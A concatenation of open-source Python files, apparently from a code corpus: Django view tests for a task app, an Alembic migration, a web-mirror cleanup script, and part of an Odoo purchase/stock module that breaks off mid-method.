            fake_constants.FAKE_PLAN['updated_resources']['stack_0']
        self.assertEqual(
            None,
            self.manager.handle_stack_after_clone(
                self.context, template, {}
            ))
| apache-2.0 |
bobsilverberg/oneanddone | oneanddone/tasks/tests/test_views.py | 4 | 17708 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.core.urlresolvers import reverse
from django.http import HttpRequest
from django.utils.translation import ugettext as _
from mock import Mock, patch
from nose.tools import eq_, ok_, assert_dict_contains_subset
from oneanddone.base.tests import TestCase
from oneanddone.tasks import views
from oneanddone.tasks.forms import (TaskImportBatchForm,
TaskForm,
TaskInvalidCriteriaFormSet)
from oneanddone.tasks.models import (BugzillaBug, Task, TaskAttempt,
TaskImportBatch)
from oneanddone.tasks.tests import (TaskFactory,
TaskImportBatchFactory,
TaskInvalidationCriterionFactory,
TaskKeywordFactory)
from oneanddone.tasks.tests.test_forms import get_filled_taskform
from oneanddone.users.tests import UserFactory
class CreateTaskViewTests(TestCase):
    """Tests for views.CreateTaskView (task creation and cloning)."""

    def setUp(self):
        self.view = views.CreateTaskView()

    def test_get_context_data_returns_add_action_and_url(self):
        """
        The 'Add' action and correct cancel_url
        should be included in the context data.
        """
        context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
        with context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['action'], 'Add')
            eq_(ctx['cancel_url'], reverse('tasks.list'))

    def test_get_form_kwargs_sets_initial_owner_to_current_user(self):
        """
        The initial owner for the form should be set to the current user.
        """
        user = UserFactory.create()
        self.view.request = Mock(user=user)
        self.view.kwargs = {}
        with patch('oneanddone.tasks.views.generic.CreateView.get_form_kwargs') as get_form_kwargs:
            get_form_kwargs.return_value = {'initial': {}}
            kwargs = self.view.get_form_kwargs()
            eq_(kwargs['initial']['owner'], user)

    def test_get_form_kwargs_populates_form_with_data_to_be_cloned(self):
        """
        When accessed via the tasks.clone url, the view displays a form
        whose initial data is that of the task being cloned, except for
        the 'name' field, which should be prefixed with 'Copy of '
        """
        user = UserFactory.create()
        original_task = TaskFactory.create()
        TaskKeywordFactory.create_batch(3, task=original_task)
        original_data = get_filled_taskform(original_task).data
        # 'clone' in kwargs signals the view that it is cloning this task.
        self.view.kwargs = {'clone': original_task.pk}
        self.view.request = Mock(user=user)
        with patch('oneanddone.tasks.views.generic.CreateView.get_form_kwargs') as get_form_kwargs:
            get_form_kwargs.return_value = {'initial': {}}
            initial = self.view.get_form_kwargs()['initial']
            eq_(initial['keywords'], original_task.keywords_list)
            eq_(initial['name'], ' '.join(['Copy of', original_task.name]))
            # All other fields must match the original task exactly.
            del original_data['name']
            assert_dict_contains_subset(original_data, initial)
class RandomTasksViewTests(TestCase):
    """Tests for views.RandomTasksView."""

    def setUp(self):
        self.view = views.RandomTasksView()

    def test_get_context_data_returns_slice(self):
        """
        A subset of 5 items should be returned when Random tasks are viewed.
        """
        with patch('oneanddone.tasks.views.generic.ListView.get_context_data') as mock_context:
            mock_context.return_value = {'object_list': list(range(0, 10))}
            context = self.view.get_context_data()
            eq_(len(context['random_task_list']), 5)
class StartTaskViewTests(TestCase):
    """Tests for views.StartTaskView (starting a task attempt)."""

    def setUp(self):
        self.view = views.StartTaskView()
        self.task = TaskFactory.create()
        self.view.get_object = Mock(return_value=self.task)

    def test_post_create_attempt(self):
        """
        If the task is available and the user doesn't have any tasks in
        progress, create a new task attempt and redirect to its page.
        """
        user = UserFactory.create()
        self.view.request = Mock(user=user)
        with patch('oneanddone.tasks.views.redirect') as redirect:
            eq_(self.view.post(), redirect.return_value)
            redirect.assert_called_with(self.task)
        # A STARTED attempt must now exist for this user/task pair.
        ok_(TaskAttempt.objects.filter(user=user, task=self.task, state=TaskAttempt.STARTED)
            .exists())

    def test_post_unavailable_task(self):
        """
        If the task is unavailable, redirect to the available tasks view
        without creating an attempt.
        """
        # Draft tasks are not available to users.
        self.task.is_draft = True
        self.task.save()
        user = UserFactory.create()
        # _messages is needed because the view adds a user-facing message.
        self.view.request = Mock(spec=HttpRequest,
                                 _messages=Mock(),
                                 user=user)
        with patch('oneanddone.tasks.views.redirect') as redirect:
            eq_(self.view.post(), redirect.return_value)
            redirect.assert_called_with('tasks.available')
        ok_(not TaskAttempt.objects.filter(user=user, task=self.task).exists())
class TaskDisplayViewTests(TestCase):
    """Tests for views.TaskDisplayView context data."""

    def setUp(self):
        self.view = views.TaskDisplayView()
        self.view.request = Mock(method='GET')
        self.view.object = Mock()
        self.view.object.name = 'name'

    def test_get_context_data_authenticated(self):
        """
        If the current user is authenticated, fetch their attempt for
        the current task using get_object_or_none.
        """
        self.view.request.user.is_authenticated.return_value = True
        get_object_patch = patch('oneanddone.tasks.views.get_object_or_none')
        context_patch = patch('oneanddone.tasks.views.generic.DetailView.get_context_data')
        with get_object_patch as get_object_or_none, context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['attempt'], get_object_or_none.return_value)
            get_object_or_none.assert_called_with(TaskAttempt, user=self.view.request.user,
                                                  task=self.view.object, state=TaskAttempt.STARTED)

    def test_get_context_data_available_task(self):
        """
        If the task is taken, correct values should be added to the context.
        """
        # NOTE(review): this test (and the three below) patch
        # generic.CreateView.get_context_data while the one above patches
        # generic.DetailView — presumably a copy-paste slip; confirm which
        # base class TaskDisplayView actually extends.
        self.view.request.user.is_authenticated.return_value = False
        self.view.object.is_taken = False
        self.view.object.is_completed = False
        context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
        with context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['gs_button_label'], _('Get Started'))
            eq_(ctx['gs_button_disabled'], False)

    def test_get_context_data_completed_task(self):
        """
        If the task is taken, correct values should be added to the context.
        """
        self.view.request.user.is_authenticated.return_value = False
        self.view.object.is_taken = False
        self.view.object.is_completed = True
        context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
        with context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['gs_button_label'], _('Completed'))
            eq_(ctx['gs_button_disabled'], True)

    def test_get_context_data_not_authenticated(self):
        """
        If the current user isn't authenticated, don't include an
        attempt in the context.
        """
        self.view.request.user.is_authenticated.return_value = False
        context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
        with context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            ok_('attempt' not in ctx)

    def test_get_context_data_taken_task(self):
        """
        If the task is taken, correct values should be added to the context.
        """
        self.view.request.user.is_authenticated.return_value = False
        self.view.object.is_taken = True
        context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
        with context_patch as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['gs_button_label'], _('Taken'))
            eq_(ctx['gs_button_disabled'], True)
class TeamViewTests(TestCase):
    """Tests for views.TeamView context data."""

    def setUp(self):
        self.view = views.TeamView()
        self.view.request = Mock()
        self.view.object = Mock()
        self.view.object.name = 'name'
        self.view.kwargs = {}

    def test_get_context_data_additional_fields(self):
        """
        context_data should include team and task_list_heading.
        """
        team = Mock()
        team.name = 'team name'
        get_team_patch = patch('oneanddone.tasks.models.TaskTeam.get_team_by_id_or_url_code')
        context_patch = patch('oneanddone.tasks.views.FilterView.get_context_data')
        with get_team_patch as get_team, context_patch as get_context_data:
            get_team.return_value = team
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['team'].name, 'team name')
            # Heading is the team name followed by ' Tasks'.
            eq_(ctx['task_list_heading'], _('team name Tasks'))
class UpdateTaskViewTests(TestCase):
    """Tests for views.UpdateTaskView."""

    def setUp(self):
        self.view = views.UpdateTaskView()

    def test_get_context_data_returns_update_action_and_url(self):
        """
        The 'Update' action and correct cancel_url
        should be included in the context data.
        """
        with patch('oneanddone.tasks.views.generic.UpdateView.get_object') as mock_get_object, \
                patch('oneanddone.tasks.views.generic.UpdateView.get_context_data') as mock_get_context:
            mock_get_object.return_value = Mock(id=1)
            mock_get_context.return_value = {}
            context = self.view.get_context_data()
            eq_(context['action'], 'Update')
            eq_(context['cancel_url'], reverse('tasks.detail', args=[1]))
class ImportTasksViewTests(TestCase):
    # Tests for ImportTasksView, a multi-stage bulk-import view for
    # Bugzilla-backed tasks (stages: fill -> preview -> confirm).

    def setUp(self):
        self.view = views.ImportTasksView()
        # _messages must exist on the mocked request because the view adds a
        # django.contrib.messages notification on success.
        self.view.request = Mock(spec=HttpRequest,
                                 _messages=Mock(),
                                 user=Mock())

    def test_get_context_data_returns_import_action_and_url(self):
        """
        The 'Import' action and correct cancel_url
        should be included in the context data.
        """
        with patch('oneanddone.tasks.views.generic.'
                   'TemplateView.get_context_data') as get_context_data:
            get_context_data.return_value = {}
            ctx = self.view.get_context_data()
            eq_(ctx['action'], 'Import')
            eq_(ctx['cancel_url'], reverse('tasks.list'))

    def test_context_data_after_get_request_has_all_forms(self):
        """ Four forms (task, batch, criterion, stage) should be
        included in the content data.
        """
        self.view.request.method = 'GET'
        response = self.view.get(self.view.request)
        ok_('stage_form__preview' in response.context_data)
        ok_('task_form' in response.context_data)
        ok_('batch_form' in response.context_data)
        ok_('criterion_formset' in response.context_data)

    def test_fill_stage_after_get_request(self):
        """ A GET request to ImportTasksView always yields the
        'fill' stage (i.e. user is entering form data)
        """
        self.view.request.method = 'GET'
        self.view.get(self.view.request)
        eq_(self.view.stage, 'fill')

    def test_form_template_after_get_request(self):
        """ A GET request to the ImportTasksView always yields the
        form.html template stage (i.e. user is entering form data)
        """
        self.view.request.method = 'GET'
        response = self.view.get(self.view.request)
        eq_(response.template_name, ['tasks/form.html'])

    def test_fill_stage_after_preview_form_invalid(self):
        """ Submitting an invalid form to 'preview' is always followed by being
        in the "fill" stage (i.e. user must correct form data)
        """
        bad_forms = {'form': Mock()}
        bad_forms['form'].is_valid.return_value = False
        with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
            get_forms.return_value = bad_forms
            self.view.request.method = 'POST'
            self.view.request.POST = {'stage': 'preview'}
            self.view.post(self.view.request)
            eq_(self.view.stage, 'fill')

    def test_confirmation_template_after_post_and_preview(self):
        """ A POST request to ImportTasksView with stage=preview
        and all forms valid leads to the confirmation.html
        template.
        """
        forms = {'batch_form': Mock(spec=TaskImportBatchForm),
                 'task_form': Mock(spec=TaskForm)}
        forms['batch_form'].is_valid.return_value = True
        # '_fresh_bugs' holds bugs fetched from Bugzilla for previewing.
        forms['batch_form'].cleaned_data = {'_fresh_bugs': ''}
        forms['task_form'].is_valid.return_value = True
        forms['task_form'].cleaned_data = {'name': ''}
        with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
            get_forms.return_value = forms
            self.view.request.method = 'POST'
            self.view.request.POST = {'stage': 'preview'}
            response = self.view.post(self.view.request)
            eq_(response.template_name, ['tasks/confirmation.html'])

    def test_form_template_after_post_and_fill(self):
        """ A POST request to ImportTasksView with stage=fill
        and all forms valid leads to the form.html
        template. (i.e. user is making changes after preview)
        """
        good_forms = {'form': Mock()}
        good_forms['form'].is_valid.return_value = True
        with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
            get_forms.return_value = good_forms
            self.view.request.method = 'POST'
            self.view.request.POST = {'stage': 'fill'}
            response = self.view.post(self.view.request)
            eq_(response.template_name, ['tasks/form.html'])

    def test_form_template_after_post_and_confirm(self):
        """ A POST request to ImportTasksView with stage=confirm
        and all forms valid leads to the tasks.list
        """
        forms = {'batch_form': Mock(spec=TaskImportBatchForm),
                 'task_form': Mock(spec=TaskForm),
                 'criterion_formset': Mock(spec=TaskInvalidCriteriaFormSet)}
        forms['batch_form'].is_valid.return_value = True
        forms['batch_form'].cleaned_data = {'_fresh_bugs': ''}
        forms['task_form'].is_valid.return_value = True
        forms['task_form'].cleaned_data = {'name': '', 'keywords': ''}
        forms['criterion_formset'].is_valid.return_value = True
        forms['criterion_formset'].forms = []
        with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
            with patch('oneanddone.tasks.views.redirect') as redirect:
                get_forms.return_value = forms
                self.view.request.method = 'POST'
                self.view.request.POST = {'stage': 'confirm'}
                # A successful confirm redirects straight to the task list.
                eq_(self.view.post(self.view.request), redirect.return_value)
                redirect.assert_called_with('tasks.list')

    def test_create_batch_of_tasks(self):
        # End-to-end check of ImportTasksView.done(): it must persist the
        # batch, one Task and one BugzillaBug per imported bug, and attach
        # every invalidation criterion to the batch.
        def save_batch(user):
            return TaskImportBatchFactory.create(creator=user)

        def save_task(user, **kwargs):
            return TaskFactory.create(creator=user)
        user = UserFactory.create()
        self.view.request = Mock(spec=HttpRequest,
                                 _messages=Mock(),
                                 user=user)
        bugs = [{u'id': 51, u'summary': u'a'}, {u'id': 52, u'summary': u'b'}]
        forms = {'batch_form': Mock(spec=TaskImportBatchForm),
                 'task_form': Mock(spec=TaskForm),
                 'criterion_formset': Mock(spec=TaskInvalidCriteriaFormSet)}
        forms['batch_form'].cleaned_data = {'_fresh_bugs': bugs}
        forms['batch_form'].save.side_effect = save_batch
        forms['task_form'].save.side_effect = save_task
        forms['task_form'].cleaned_data = {'keywords': 'foo, bar'}
        forms['criterion_formset'].forms = [
            Mock(
                cleaned_data={'criterion': TaskInvalidationCriterionFactory.create()})
            for i in range(2)]
        self.view.done(forms)
        batch = TaskImportBatch.objects.get(creator=user)
        # Raises BugzillaBug.DoesNotExist if the bug was not persisted.
        BugzillaBug.objects.get(bugzilla_id=51)
        ok_(Task.objects.filter(creator=user,
                                batch=batch).exists())
        eq_(Task.objects.filter(batch=batch).count(), len(bugs))
        eq_(BugzillaBug.objects.count(), len(bugs))
        eq_(batch.taskinvalidationcriterion_set.count(),
            len(forms['criterion_formset'].forms))
        eq_(sorted(Task.objects.filter(batch=batch)[0].keywords_list),
            sorted(forms['task_form'].cleaned_data['keywords']))
| mpl-2.0 |
VinnieJohns/ggrc-core | src/ggrc/migrations/versions/20170222151635_2e049f7d3b0b_update_roles_in_options_table.py | 3 | 1132 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
update roles in options table
Create Date: 2017-02-13 06:00:17.987416
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
from alembic import op
# revision identifiers, used by Alembic.
revision = '19a4d5cfc0b8'
down_revision = '4e43a2374e2c'
def upgrade():
    """Upgrade database schema and/or data, creating a new revision."""
    # Drop any pre-existing 'product_kind' rows first so the rename below
    # cannot produce duplicates, then rename 'product_type' over it.
    op.execute("DELETE from options where role='product_kind'")
    op.execute(
        "UPDATE options set role='product_kind' "
        "where role='product_type'"
    )
def downgrade():
    """Downgrade database schema and/or data back to the previous revision."""
    # Restore the original role name, then re-create the row that the
    # upgrade deleted (fixed id 109, 'Not Applicable').
    op.execute(
        "UPDATE options set role='product_type' "
        "where role='product_kind'"
    )
    op.execute(
        "INSERT INTO options (id,role,title,created_at,updated_at) "
        "values(109,'product_kind','Not Applicable',NOW(),NOW())"
    )
| apache-2.0 |
fake-name/ReadableWebProxy | WebMirror/management/GravityTalesManage.py | 1 | 1202 |
import calendar
import datetime
import json
import os
import os.path
import shutil
import traceback
from concurrent.futures import ThreadPoolExecutor
import urllib.error
import urllib.parse
from sqlalchemy import and_
from sqlalchemy import or_
import sqlalchemy.exc
from sqlalchemy_continuum_vendored.utils import version_table
if __name__ == "__main__":
import logSetup
logSetup.initLogging()
import common.database as db
import common.Exceptions
import common.management.file_cleanup
import Misc.HistoryAggregator.Consolidate
import flags
import pprint
import config
from config import C_RAW_RESOURCE_DIR
import WebMirror.OutputFilters.rss.FeedDataParser
def exposed_delete_gravitytales_bot_blocked_pages():
    '''
    Delete the "checking you're not a bot" garbage pages
    that sometimes get through the gravitytales scraper.
    '''
    with db.session_context() as sess:
        # Purge from both the live table and its continuum history table.
        for table in (db.WebPages.__table__, version_table(db.WebPages.__table__)):
            delete_stmt = (
                table.delete()
                .where(table.c.netloc == "gravitytales.com")
                .where(table.c.content.like('%<div id="bot-alert" class="alert alert-info">%'))
            )
            print(delete_stmt)
            sess.execute(delete_stmt)
        sess.commit()
| bsd-3-clause |
idncom/odoo | addons/purchase/stock.py | 58 | 18545 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class stock_move(osv.osv):
    # Extends stock.move with a link back to the purchase order line that
    # generated it, and uses that link to propagate purchase data (unit
    # price, taxes, partner/currency) onto quants and supplier invoices.
    _inherit = 'stock.move'
    _columns = {
        'purchase_line_id': fields.many2one('purchase.order.line',
            'Purchase Order Line', ondelete='set null', select=True,
            readonly=True),
    }

    def get_price_unit(self, cr, uid, move, context=None):
        """ Returns the unit price to store on the quant """
        # Purchase moves keep the negotiated PO price instead of the cost
        # computed by the base implementation.
        if move.purchase_line_id:
            return move.price_unit
        return super(stock_move, self).get_price_unit(cr, uid, move, context=context)

    def write(self, cr, uid, ids, vals, context=None):
        # On transition to done/cancel, push the related purchase order
        # through its workflow; for cancelled moves of invoice-on-picking
        # orders, also refresh the PO lines' "invoiced" flag.
        if isinstance(ids, (int, long)):
            ids = [ids]
        res = super(stock_move, self).write(cr, uid, ids, vals, context=context)
        from openerp import workflow
        if vals.get('state') in ['done', 'cancel']:
            po_to_check = []
            for move in self.browse(cr, uid, ids, context=context):
                if move.purchase_line_id and move.purchase_line_id.order_id:
                    order = move.purchase_line_id.order_id
                    order_id = order.id
                    # update linked purchase order as superuser as the warehouse
                    # user may not have rights to access purchase.order
                    if self.pool.get('purchase.order').test_moves_done(cr, uid, [order_id], context=context):
                        workflow.trg_validate(SUPERUSER_ID, 'purchase.order', order_id, 'picking_done', cr)
                    if self.pool.get('purchase.order').test_moves_except(cr, uid, [order_id], context=context):
                        workflow.trg_validate(SUPERUSER_ID, 'purchase.order', order_id, 'picking_cancel', cr)
                    if order_id not in po_to_check and vals['state'] == 'cancel' and order.invoice_method == 'picking':
                        po_to_check.append(order_id)
            # Some moves which are cancelled might be part of a PO line which is partially
            # invoiced, so we check if some PO line can be set on "invoiced = True".
            if po_to_check:
                self.pool.get('purchase.order')._set_po_lines_invoiced(cr, uid, po_to_check, context=context)
        return res

    def copy(self, cr, uid, id, default=None, context=None):
        default = default or {}
        context = context or {}
        if not default.get('split_from'):
            #we don't want to propagate the link to the purchase order line except in case of move split
            default['purchase_line_id'] = False
        return super(stock_move, self).copy(cr, uid, id, default, context)

    def _create_invoice_line_from_vals(self, cr, uid, move, invoice_line_vals, context=None):
        # Carry the PO line reference and analytic account onto the new
        # invoice line, then cross-link invoice line / invoice with the PO.
        if move.purchase_line_id:
            invoice_line_vals['purchase_line_id'] = move.purchase_line_id.id
            invoice_line_vals['account_analytic_id'] = move.purchase_line_id.account_analytic_id.id or False
        invoice_line_id = super(stock_move, self)._create_invoice_line_from_vals(cr, uid, move, invoice_line_vals, context=context)
        if move.purchase_line_id:
            purchase_line = move.purchase_line_id
            self.pool.get('purchase.order.line').write(cr, uid, [purchase_line.id], {
                'invoice_lines': [(4, invoice_line_id)]
            }, context=context)
            self.pool.get('purchase.order').write(cr, uid, [purchase_line.order_id.id], {
                'invoice_ids': [(4, invoice_line_vals['invoice_id'])],
            })
            purchase_line_obj = self.pool.get('purchase.order.line')
            purchase_obj = self.pool.get('purchase.order')
            invoice_line_obj = self.pool.get('account.invoice.line')
            purchase_id = move.purchase_line_id.order_id.id
            # Also invoice the order's not-yet-invoiced lines that carry no
            # product (or a service product): they never produce a move, so
            # they would otherwise be skipped entirely.
            purchase_line_ids = purchase_line_obj.search(cr, uid, [('order_id', '=', purchase_id), ('invoice_lines', '=', False), '|', ('product_id', '=', False), ('product_id.type', '=', 'service')], context=context)
            if purchase_line_ids:
                inv_lines = []
                for po_line in purchase_line_obj.browse(cr, uid, purchase_line_ids, context=context):
                    acc_id = purchase_obj._choose_account_from_po_line(cr, uid, po_line, context=context)
                    inv_line_data = purchase_obj._prepare_inv_line(cr, uid, acc_id, po_line, context=context)
                    inv_line_id = invoice_line_obj.create(cr, uid, inv_line_data, context=context)
                    inv_lines.append(inv_line_id)
                    po_line.write({'invoice_lines': [(4, inv_line_id)]})
                invoice_line_obj.write(cr, uid, inv_lines, {'invoice_id': invoice_line_vals['invoice_id']}, context=context)
        return invoice_line_id

    def _get_master_data(self, cr, uid, move, company, context=None):
        # Pick invoice partner/creator/currency from the purchase order
        # when available; otherwise fall back to the picking partner's
        # purchase pricelist currency for incoming moves.
        if context.get('inv_type') == 'in_invoice' and move.purchase_line_id:
            purchase_order = move.purchase_line_id.order_id
            return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
        if context.get('inv_type') == 'in_refund' and move.origin_returned_move_id.purchase_line_id:
            purchase_order = move.origin_returned_move_id.purchase_line_id.order_id
            return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
        elif context.get('inv_type') in ('in_invoice', 'in_refund') and move.picking_id:
            # In case of an extra move, it is better to use the data from the original moves
            for purchase_move in move.picking_id.move_lines:
                if purchase_move.purchase_line_id:
                    purchase_order = purchase_move.purchase_line_id.order_id
                    return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
        partner = move.picking_id and move.picking_id.partner_id or False
        code = self.get_code_from_locs(cr, uid, move, context=context)
        if partner and partner.property_product_pricelist_purchase and code == 'incoming':
            currency = partner.property_product_pricelist_purchase.currency_id.id
            return partner, uid, currency
        return super(stock_move, self)._get_master_data(cr, uid, move, company, context=context)

    def _get_invoice_line_vals(self, cr, uid, move, partner, inv_type, context=None):
        # Override taxes and unit price with the purchase line's values for
        # supplier invoices (and their refunds via the returned move).
        res = super(stock_move, self)._get_invoice_line_vals(cr, uid, move, partner, inv_type, context=context)
        if inv_type == 'in_invoice' and move.purchase_line_id:
            purchase_line = move.purchase_line_id
            res['invoice_line_tax_id'] = [(6, 0, [x.id for x in purchase_line.taxes_id])]
            res['price_unit'] = purchase_line.price_unit
        elif inv_type == 'in_refund' and move.origin_returned_move_id.purchase_line_id:
            purchase_line = move.origin_returned_move_id.purchase_line_id
            res['invoice_line_tax_id'] = [(6, 0, [x.id for x in purchase_line.taxes_id])]
            res['price_unit'] = purchase_line.price_unit
        return res

    def _get_moves_taxes(self, cr, uid, moves, inv_type, context=None):
        # For supplier invoices, moves tied to a PO line are not "extra"
        # moves and take the PO line's taxes; other moves with supplier
        # taxes borrow the fiscal position of a sibling PO move on the
        # same picking to map their taxes.
        is_extra_move, extra_move_tax = super(stock_move, self)._get_moves_taxes(cr, uid, moves, inv_type, context=context)
        if inv_type == 'in_invoice':
            for move in moves:
                if move.purchase_line_id:
                    is_extra_move[move.id] = False
                    extra_move_tax[move.picking_id, move.product_id] = [(6, 0, [x.id for x in move.purchase_line_id.taxes_id])]
                elif move.product_id.product_tmpl_id.supplier_taxes_id:
                    mov_id = self.search(cr, uid, [('purchase_line_id', '!=', False), ('picking_id', '=', move.picking_id.id)], limit=1, context=context)
                    if mov_id:
                        mov = self.browse(cr, uid, mov_id[0], context=context)
                        fp = mov.purchase_line_id.order_id.fiscal_position
                        res = self.pool.get("account.invoice.line").product_id_change(cr, uid, [], move.product_id.id, None, partner_id=move.picking_id.partner_id.id, fposition_id=(fp and fp.id), type='in_invoice', context=context)
                        extra_move_tax[0, move.product_id] = [(6, 0, res['value']['invoice_line_tax_id'])]
        return (is_extra_move, extra_move_tax)

    def attribute_price(self, cr, uid, move, context=None):
        """
        Attribute price to move, important in inter-company moves or receipts with only one partner
        """
        # The method attribute_price of the parent class sets the price to the standard product
        # price if move.price_unit is zero. We don't want this behavior in the case of a purchase
        # order since we can purchase goods which are free of charge (e.g. 5 units offered if 100
        # are purchased).
        if move.purchase_line_id:
            return
        code = self.get_code_from_locs(cr, uid, move, context=context)
        if not move.purchase_line_id and code == 'incoming' and not move.price_unit:
            partner = move.picking_id and move.picking_id.partner_id or False
            price = False
            # If partner given, search price in its purchase pricelist
            if partner and partner.property_product_pricelist_purchase:
                pricelist_obj = self.pool.get("product.pricelist")
                pricelist = partner.property_product_pricelist_purchase.id
                price = pricelist_obj.price_get(cr, uid, [pricelist],
                    move.product_id.id, move.product_uom_qty, partner.id, {
                        'uom': move.product_uom.id,
                        'date': move.date,
                    })[pricelist]
            if price:
                return self.write(cr, uid, [move.id], {'price_unit': price}, context=context)
        super(stock_move, self).attribute_price(cr, uid, move, context=context)

    def _get_taxes(self, cr, uid, move, context=None):
        # Refund moves reuse the taxes of the originating purchase line.
        if move.origin_returned_move_id.purchase_line_id.taxes_id:
            return [tax.id for tax in move.origin_returned_move_id.purchase_line_id.taxes_id]
        return super(stock_move, self)._get_taxes(cr, uid, move, context=context)
class stock_picking(osv.osv):
    # Extends stock.picking with a stored flag telling whether the receipt
    # can be invoiced, and purchase-aware invoice defaults.
    _inherit = 'stock.picking'

    def _get_to_invoice(self, cr, uid, ids, name, args, context=None):
        """Functional field getter: True when the picking still contains a
        move tied to a PO line of an invoice-on-picking order and that move
        does not originate from another move (i.e. it is a real receipt)."""
        res = {}
        for picking in self.browse(cr, uid, ids, context=context):
            res[picking.id] = False
            for move in picking.move_lines:
                if move.purchase_line_id and move.purchase_line_id.order_id.invoice_method == 'picking':
                    if not move.move_orig_ids:
                        res[picking.id] = True
        return res

    def _get_picking_to_recompute(self, cr, uid, ids, context=None):
        """Return ids of pickings whose stored 'reception_to_invoice' value
        must be recomputed when the given stock.move records change."""
        picking_ids = set()
        for move in self.pool.get('stock.move').browse(cr, uid, ids, context=context):
            if move.picking_id and move.purchase_line_id:
                picking_ids.add(move.picking_id.id)
        return list(picking_ids)

    _columns = {
        'reception_to_invoice': fields.function(_get_to_invoice, type='boolean', string='Invoiceable on incoming shipment?',
            help='Does the picking contains some moves related to a purchase order invoiceable on the receipt?',
            store={
                'stock.move': (_get_picking_to_recompute, ['purchase_line_id', 'picking_id'], 10),
            }),
    }

    def _create_invoice_from_picking(self, cr, uid, picking, vals, context=None):
        # The registry lookups previously performed here (purchase.order,
        # purchase.order.line, account.invoice.line) were dead code: their
        # results were never used.  Simply delegate to the base behavior.
        return super(stock_picking, self)._create_invoice_from_picking(cr, uid, picking, vals, context=context)

    def _get_invoice_vals(self, cr, uid, key, inv_type, journal_id, move, context=None):
        """Default the invoice's fiscal position and payment term from the
        purchase order when the move comes from one."""
        inv_vals = super(stock_picking, self)._get_invoice_vals(cr, uid, key, inv_type, journal_id, move, context=context)
        if move.purchase_line_id and move.purchase_line_id.order_id:
            purchase = move.purchase_line_id.order_id
            inv_vals.update({
                'fiscal_position': purchase.fiscal_position.id,
                'payment_term': purchase.payment_term_id.id,
            })
        return inv_vals
class stock_warehouse(osv.osv):
    # Extends stock.warehouse with a 'buy' procurement rule so the
    # warehouse can be resupplied through purchase orders.
    _inherit = 'stock.warehouse'
    _columns = {
        'buy_to_resupply': fields.boolean('Purchase to resupply this warehouse',
            help="When products are bought, they can be delivered to this warehouse"),
        'buy_pull_id': fields.many2one('procurement.rule', 'Buy rule'),
    }
    _defaults = {
        'buy_to_resupply': True,
    }

    def _get_buy_pull_rule(self, cr, uid, warehouse, context=None):
        """Return the creation values of the warehouse's 'buy' procurement rule."""
        route_obj = self.pool.get('stock.location.route')
        data_obj = self.pool.get('ir.model.data')
        try:
            buy_route_id = data_obj.get_object_reference(cr, uid, 'purchase', 'route_warehouse0_buy')[1]
        except:
            # XML id missing (e.g. data renamed/reloaded): fall back to a
            # name search for the generic Buy route.
            buy_route_id = route_obj.search(cr, uid, [('name', 'like', _('Buy'))], context=context)
            buy_route_id = buy_route_id and buy_route_id[0] or False
        if not buy_route_id:
            raise osv.except_osv(_('Error!'), _('Can\'t find any generic Buy route.'))
        return {
            'name': self._format_routename(cr, uid, warehouse, _(' Buy'), context=context),
            'location_id': warehouse.in_type_id.default_location_dest_id.id,
            'route_id': buy_route_id,
            'action': 'buy',
            'picking_type_id': warehouse.in_type_id.id,
            'warehouse_id': warehouse.id,
        }

    def create_routes(self, cr, uid, ids, warehouse, context=None):
        """Also create the 'buy' pull rule when the warehouse resupplies by purchase."""
        pull_obj = self.pool.get('procurement.rule')
        res = super(stock_warehouse, self).create_routes(cr, uid, ids, warehouse, context=context)
        if warehouse.buy_to_resupply:
            buy_pull_vals = self._get_buy_pull_rule(cr, uid, warehouse, context=context)
            buy_pull_id = pull_obj.create(cr, uid, buy_pull_vals, context=context)
            res['buy_pull_id'] = buy_pull_id
        return res

    def write(self, cr, uid, ids, vals, context=None):
        """Create or remove the 'buy' rule when buy_to_resupply is toggled."""
        pull_obj = self.pool.get('procurement.rule')
        if isinstance(ids, (int, long)):
            ids = [ids]
        if 'buy_to_resupply' in vals:
            if vals.get("buy_to_resupply"):
                # NOTE(review): when several warehouses are written at once,
                # only the last created rule ends up in vals -- pre-existing
                # behavior kept as-is.
                for warehouse in self.browse(cr, uid, ids, context=context):
                    if not warehouse.buy_pull_id:
